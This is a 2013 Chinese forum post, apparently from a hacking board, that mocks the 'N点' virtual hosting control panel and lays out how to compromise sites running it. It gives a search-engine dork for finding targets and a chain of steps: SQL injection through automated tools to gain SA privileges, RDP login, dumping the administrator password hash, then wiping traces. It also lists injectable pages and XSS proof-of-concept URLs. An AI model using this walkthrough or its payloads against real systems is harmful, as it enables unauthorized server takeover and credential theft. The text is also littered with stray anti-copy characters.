不得不说N点实在是一个破东西0 B/ M( L* L( P% R; Z
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂6 f& }9 W N6 a4 [5 B" F
好吧 抱怨一下就行了 接下来关键的时候到了
1 G9 O5 e1 L$ Z2 c" F/ N首先百度搜索关键字:inurl: (mmdatabase.asp)
) a1 i, B% X! U. Z) }2 c0 `* i我随便列举一个: www.xxxx.com
( _5 v8 o7 P. F" f. {' \- _修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
( [4 e9 R5 X9 `) V扔入NBSI 或者啊D等各种傻逼工具后2 O) h L* N6 `+ z
你们会看到是SA权限' T0 Z$ L# Q# }( ~2 G
果断3389 上去 hash得到administrator密码
7 S3 g6 d, {; E6 i# r3 v+ K4 b) l1 I擦屁股走人~
- M. V9 c6 k1 T6 B7 F) v9 _经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
- U( d/ Q9 P' }+ X3 \+ S" n- a2 S: B
7 R4 Z, k5 X* y: J再附上其他几个漏洞页面3 j+ w+ ~+ x7 z r9 W7 p3 i6 n9 k
SQL:
5 R" c. G' |, `( B7 ?http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
5 m9 |. _- c5 H; ]* \http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
% B( ^: j9 }; B Q$ q2 l7 {" whttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
2 a9 d! W! i" k7 W1 k4 ^" ?http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
0 k" L# X# V! b- l/ M- [XSS证明:
6 h! w* E# j; O/ Z4 X! V( Zhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
- i' C( K: c, G. g* w' k, nhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”& ^4 ^/ ]5 p% K6 F# m
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script># t9 ?! `' T u1 X6 _
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
( O/ D# @% [2 N% S9 t; o还是星外吧 你们懂的
$ m/ M: x5 K* _% B/ N作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?# q/ k' C$ h% u; {% _
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉$ M6 L8 A; o' k
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对